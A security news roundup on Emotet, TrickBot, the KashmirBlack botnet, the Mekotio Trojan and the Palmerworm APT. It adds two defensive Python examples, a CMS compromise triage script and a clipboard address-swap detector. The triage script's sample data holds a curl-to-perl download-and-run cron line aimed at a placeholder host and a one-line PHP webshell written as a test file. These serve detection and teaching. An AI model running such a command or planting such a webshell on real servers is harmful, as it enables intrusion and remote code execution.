Emotet and TrickBot top the list

TrickBot and Emotet topped the list of the most prolific malware strains in October, helping to drive a surge in ransomware infections.

Emotet was the most widespread malware last month, affecting 12% of organizations. TrickBot and the Android malware Hiddad came next, with a global impact of 4% each.

Both Emotet and TrickBot began life as banking Trojans, but they have evolved significantly in recent years and now feature advanced modular functionality that enables everything from cryptojacking and ransomware to sophisticated data theft.

Increasingly, they are being used to provide access for attackers and maintain persistence in victim networks as a precursor to additional malware downloads such as ransomware.

This led to a 71% increase in ransomware attacks on US healthcare organizations last month versus September, while the figures jumped 36% in EMEA and 33% in APAC.

Ransomware attacks have been rising since the start of the coronavirus pandemic, as attackers try to take advantage of the security gaps left while businesses scrambled to support remote workforces. These attacks have surged alarmingly over the past three months, particularly against the healthcare sector, and are driven by pre-existing TrickBot and Emotet infections.

The findings chime with those of HP Inc, which found last week that attacks using the Emotet Trojan soared by more than 1200% from Q2 to Q3 of this year.

KashmirBlack Botnet

The highly sophisticated botnet, named KashmirBlack by US-based cybersecurity firm Imperva, is believed to have infected hundreds of thousands of websites by attacking their underlying CMS platforms. The main victims are Drupal and WordPress sites.

The botnet's primary purpose appears to be infecting websites and then using their servers for cryptocurrency mining.

The operators are based in Indonesia, which is also where the command-and-control (C&C) infrastructure has been placed.

The botnet is the work of a hacker named “Exect1337”, a member of the Indonesian hacker crew PhantomGhost.

“The KashmirBlack C&C has three main roles: supply a Perl script that infects the victim server with the botnet malicious script, receive reports of findings and attack results from bots, and supply bots with attack instructions.” Most of the victim sites are in the US.

The KashmirBlack C&C has a scanner that searches for sites running CMS platforms, creates an attack instruction for the newly found sites, and pushes it into a queue from which bots receive the instructions and carry out the attack.

The team found more than 20 distinct exploits.

The team advised several actions that should be taken if your server is infected by the KashmirBlack botnet:

“Kill malicious processes, remove malicious files, remove suspicious and unfamiliar jobs and remove unused plugins and themes”.

The site administrator should ensure the CMS core files and third-party modules are always up-to-date and properly configured.

“Strong and unique passwords are recommended, as they are the first defence against brute force attacks.”
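The remediation advice above (kill malicious processes, remove malicious files, remove unfamiliar scheduled jobs) is a manual checklist. The script below is an added example, not Imperva's tooling and not part of the original report, showing how a defender might triage a compromised CMS host before cleaning it: it flags cron entries that fetch something over the network and hand it to an interpreter (the way the report says the C&C supplies a Perl infection script), lists PHP files modified recently, and looks for `eval()` wrapped around a decoder, a common webshell pattern. The heuristics, the sample crontab and the sample webroot are constructed for the example.

```python
import os
import re
import tempfile
import time
from pathlib import Path

# Constructed heuristics (assumptions for this example, not indicators from the report):
# a cron entry that downloads content and pipes it into an interpreter is an
# "unfamiliar job" worth reviewing; eval() around a decoder is a common webshell idiom.
FETCH_RE = re.compile(r"\b(curl|wget|fetch)\b")
EXEC_RE = re.compile(r"\b(perl|sh|bash|python\d?|php)\b")
OBFUSCATION_RE = re.compile(rb"eval\s*\(\s*(base64_decode|gzinflate|str_rot13)\s*\(")


def suspicious_cron_jobs(crontab_text):
    """Return cron lines that both fetch from the network and execute the result."""
    hits = []
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if FETCH_RE.search(line) and EXEC_RE.search(line):
            hits.append(line)
    return hits


def recently_modified_php(webroot, days, now=None):
    """PHP files under webroot whose mtime falls within `days` of `now` (epoch seconds)."""
    now = time.time() if now is None else now
    cutoff = now - days * 86400
    return sorted(str(p) for p in Path(webroot).rglob("*.php") if p.stat().st_mtime >= cutoff)


def obfuscated_php(webroot):
    """PHP files containing eval() applied to a decoded string."""
    return sorted(str(p) for p in Path(webroot).rglob("*.php") if OBFUSCATION_RE.search(p.read_bytes()))


def triage(webroot, crontab_text, days=7):
    """Collect the three findings an administrator would review before removal."""
    return {
        "cron": suspicious_cron_jobs(crontab_text),
        "recent_php": recently_modified_php(webroot, days),
        "obfuscated_php": obfuscated_php(webroot),
    }


# Constructed sample crontab: one benign renewal job, one download-and-run job, one reboot hook.
SAMPLE_CRONTAB = """\
# constructed sample for the example
0 3 * * * /usr/bin/certbot renew --quiet
*/5 * * * * curl -s http://example.invalid/x.pl | perl
@reboot /usr/local/bin/backup.sh
"""


def build_sample_webroot():
    """Create a constructed WordPress-like tree: an old core file and a fresh upload
    carrying an obfuscated payload. Returns the webroot path."""
    root = Path(tempfile.mkdtemp(prefix="kb-example-"))
    old = root / "wp-includes" / "version.php"
    old.parent.mkdir(parents=True)
    old.write_text("<?php $wp_version = '5.5.1';\n")
    old_time = time.time() - 90 * 86400          # untouched for 90 days
    os.utime(old, (old_time, old_time))
    fresh = root / "wp-content" / "uploads" / "cache.php"
    fresh.parent.mkdir(parents=True)
    fresh.write_text("<?php eval(base64_decode($_POST['c']));\n")
    return str(root)


if __name__ == "__main__":
    for key, value in triage(build_sample_webroot(), SAMPLE_CRONTAB).items():
        print(key, value)
```

On a real host you would feed `crontab -l -u <webuser>` output and the actual document root; the findings are a review list, not an automatic kill list, since a legitimate deployment script can also match the cron heuristic.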

LatAm Banking Trojan

The Mekotio banking Trojan, originally known for targeting banking customers in Chile, has been expanding its scope both geographically and tactically. Mekotio is the second banking malware observed doing this within the same week.

Multiple distinct malware families have wreaked havoc on Latin American banks for years; the variants include Amavaldo, Casbaneiro, Grandoreiro, Guildma, Krachulka, Lokorrito, Mekotio, Mispadu, Numando, Vadokrist and Zumanek.

Mekotio expands across Latin America

Mekotio's operators have been regularly updating their malware to cover more financial organizations across several Latin American countries, and several new enhancements have been observed recently.

  • Researchers found several variants of the Mekotio Trojan that were built specifically to target users in Spain. Besides normal banking services, it also targets e-banking users from a small set of countries.
  • The malware spreads through spam emails that use social engineering tactics, such as impersonating government or private agencies, to lure users into clicking malicious links included in the message body.
  • Mekotio can steal banking credentials stored in some web browsers such as Google Chrome and Opera. Additionally, it has been updated with the ability to replace bitcoin wallet addresses copied to the clipboard with the attacker's wallet address.
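The clipboard-swap capability in the last bullet has a simple defender-side counterpart: before a payment is sent, confirm that the address now on the clipboard is the one the user actually copied. The code below is an added example, not Mekotio's code and not from the original article. It validates legacy Base58Check Bitcoin addresses (P2PKH and P2SH mainnet only; bech32 is out of scope here) and classifies a copy/paste pair as unchanged, swapped, or merely changed. The `(copied, clipboard_now)` pairs are a constructed simulation of what a clipboard monitor would observe; the two sample addresses are well-known public ones (the genesis-block address and the Bitcoin wiki's example address).

```python
import hashlib
import re

B58_ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
# Shape of a legacy mainnet address: version prefix '1' (P2PKH) or '3' (P2SH).
LEGACY_RE = re.compile(r"[13][" + B58_ALPHABET + "]{25,34}")


def b58decode(text):
    """Decode Base58 text to bytes, restoring leading zero bytes encoded as '1'."""
    n = 0
    for ch in text:
        n = n * 58 + B58_ALPHABET.index(ch)   # ValueError on a non-alphabet character
    body = n.to_bytes((n.bit_length() + 7) // 8, "big") if n else b""
    leading = len(text) - len(text.lstrip("1"))
    return b"\x00" * leading + body


def is_valid_legacy_address(text):
    """True if text is a mainnet P2PKH/P2SH address whose double-SHA256 checksum verifies."""
    if not LEGACY_RE.fullmatch(text):
        return False
    try:
        raw = b58decode(text)
    except ValueError:
        return False
    if len(raw) != 25 or raw[0] not in (0x00, 0x05):
        return False
    payload, checksum = raw[:-4], raw[-4:]
    return hashlib.sha256(hashlib.sha256(payload).digest()).digest()[:4] == checksum


def classify_clipboard_change(copied, clipboard_now):
    """Compare the text the user copied with what the clipboard holds at paste time."""
    if copied == clipboard_now:
        return "unchanged"
    if is_valid_legacy_address(copied) and is_valid_legacy_address(clipboard_now):
        return "address_swapped"     # one valid address silently replaced by another
    return "changed"


def find_swaps(events):
    """events: iterable of (copied, clipboard_now) pairs; returns the swapped ones."""
    return [(c, n) for c, n in events if classify_clipboard_change(c, n) == "address_swapped"]


# Constructed sample: a benign paste, a swapped address, and ordinary text.
SAMPLE_EVENTS = [
    ("1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa", "1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa"),
    ("1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa", "1BvBMSEYstWetqTFn5Au4m4GFg7xJaNVN2"),
    ("hello world", "hello world!"),
]

if __name__ == "__main__":
    for copied, now in SAMPLE_EVENTS:
        print(classify_clipboard_change(copied, now), copied, "->", now)
```

A wallet or endpoint agent would obtain the pairs by recording the clipboard at copy time and reading it again just before paste; the checksum step matters because a swap by a family like Mekotio substitutes a fully valid address, so format checks alone never trip.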

Since its first detection in March 2018, Mekotio’s developers have been making gradual improvements in this Windows-based malware, which is developed in Embarcadero Delphi.

Current coverage

As of now, Mekotio malware has a presence in Chile (having the highest detection), followed by Brazil and Mexico (medium level of detection), and then Peru, Colombia, Argentina, Ecuador, and Bolivia.

Palmerworm: Active Chinese APT

A new espionage campaign is targeting the media, construction, engineering, electronics, and finance sectors in Japan, Taiwan, the US, and China. The attacks are linked to Palmerworm (aka BlackTech), likely a China-based advanced persistent threat (APT) group, with initial traces found in 2019. It is primarily a cyber-espionage campaign.

Among the multiple victims infected by Palmerworm, the media, electronics, and finance companies were all based in Taiwan, while an engineering company in Japan and a construction firm in China were also targeted.

A 2017 analysis by Trend Micro found the group to have orchestrated three campaigns (PLEAD, Shrouded Crossbow, and Waterbear) intended to steal confidential documents and the targets' intellectual property.

Stating that some of the identified malware samples matched PLEAD, the researchers said they identified four previously undocumented backdoors (Backdoor.Consock, Backdoor.Waship, Backdoor.Dalwit, and Backdoor.Nomri).

The brand new custom malware toolset alone would have made attribution difficult, were it not for the group's use of dual-use tools (such as PuTTY, PsExec, SNScan, and WinRAR) and of stolen code-signing certificates to digitally sign its malicious payloads and thwart detection, a tactic it has been found to employ before.

Another detail that is still unclear is the infection vector itself, the method Palmerworm used to gain initial access to victim networks. The group has, however, leveraged spear-phishing emails in the past to deliver and install its backdoor, either as an attachment or through links to cloud storage services.

“APT groups continue to be highly active in 2020, with their use of dual-use tools and living-off-the-land tactics making their activity ever harder to detect, and underlining the need for customers to have a comprehensive security solution in place that can detect this kind of activity.”